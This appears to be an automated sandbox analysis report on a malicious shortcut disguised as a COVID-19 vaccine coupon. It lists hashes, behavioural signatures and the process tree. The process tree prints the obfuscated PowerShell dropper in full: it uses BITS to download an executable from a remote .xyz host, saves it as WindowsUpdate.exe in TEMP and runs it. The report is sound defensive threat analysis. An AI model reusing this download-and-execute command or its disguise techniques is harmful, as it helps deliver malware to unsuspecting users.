Analysis
-
max time kernel
133s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220113 -
submitted
28-02-2022 03:10
Behavioral task
behavioral1
Sample
COVID-19-Vaccine-Coupon/COVID-19-Vaccine-Coupon.lnk
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
COVID-19-Vaccine-Coupon/COVID-19-Vaccine-Coupon.lnk
Resource
win10v2004-en-20220113
Behavioral task
behavioral3
Sample
EUA 27034_FS for Vaccination Providers-Full EUA PI_Final_4.6.2021.pdf
Resource
win7-en-20211208
Behavioral task
behavioral4
Sample
EUA 27034_FS for Vaccination Providers-Full EUA PI_Final_4.6.2021.pdf
Resource
win10v2004-en-20220113
Behavioral task
behavioral5
Sample
SUMMARY OF PRODUCT CHARACTERISTICS/comirnaty-epar-product-information_en.pdf
Resource
win7-en-20211208
Behavioral task
behavioral6
Sample
SUMMARY OF PRODUCT CHARACTERISTICS/comirnaty-epar-product-information_en.pdf
Resource
win10v2004-en-20220113
General
-
Target
COVID-19-Vaccine-Coupon/COVID-19-Vaccine-Coupon.lnk
-
Size
1KB
-
MD5
5897322f62070e894488b4115463939d
-
SHA1
217490d9df6b3eb30caec933c6f3a04ae3a3a82f
-
SHA256
101d9f3a9e4a8d0c8d80bcd40082e10ab71a7d45a04ab443ef8761dfad246ca5
-
SHA512
83cdc338ce8c7f5bf030ddd654a17b3a7fc6283d9331e5c0eeadc3e4c98aacfb72d51890e9dcb56f4115cd05fba09a0d45a2c751e599c1c45122b86db65f87d1
Malware Config
Extracted
http://1000018.xyz/soft-2/280421-z1z.exe
Signatures
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2960 powershell.exe 2960 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2960 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
cmd.execmd.exedescription pid process target process PID 1564 wrote to memory of 2772 1564 cmd.exe cmd.exe PID 1564 wrote to memory of 2772 1564 cmd.exe cmd.exe PID 2772 wrote to memory of 2960 2772 cmd.exe powershell.exe PID 2772 wrote to memory of 2960 2772 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\COVID-19-Vaccine-Coupon\COVID-19-Vaccine-Coupon.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" && C:\Windows\System32\cmd.exe /c poweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://1000'+'018.x'+'yz'+'/so'+'ft-2'+'/28'+'04'+'21-z1z.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepoweRshELL.eXE -w 1 $env:SEE_MASK_NOZONECHECKS = 1; Im`Po`RT`-modULe bItsTR`Ans`Fer; STArt-b`IT`sT`R`AN`SF`ER -Source "('ht'+'tp'+'://1000'+'018.x'+'yz'+'/so'+'ft-2'+'/28'+'04'+'21-z1z.e'+'xe')" -Destination $ENV:TEMP\WindowsUpdate.exe ;.('cd') ${eNv:TEMP}; ./`WindowsUpdate.exe3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/2960-130-0x000002A0CC580000-0x000002A0CC5A2000-memory.dmpFilesize
136KB
-
memory/2960-131-0x000002A0CC600000-0x000002A0CC614000-memory.dmpFilesize
80KB
-
memory/2960-132-0x00007FFF381E3000-0x00007FFF381E5000-memory.dmpFilesize
8KB
-
memory/2960-134-0x000002A0AEF63000-0x000002A0AEF65000-memory.dmpFilesize
8KB
-
memory/2960-133-0x000002A0AEF60000-0x000002A0AEF62000-memory.dmpFilesize
8KB
-
memory/2960-135-0x000002A0AEF66000-0x000002A0AEF68000-memory.dmpFilesize
8KB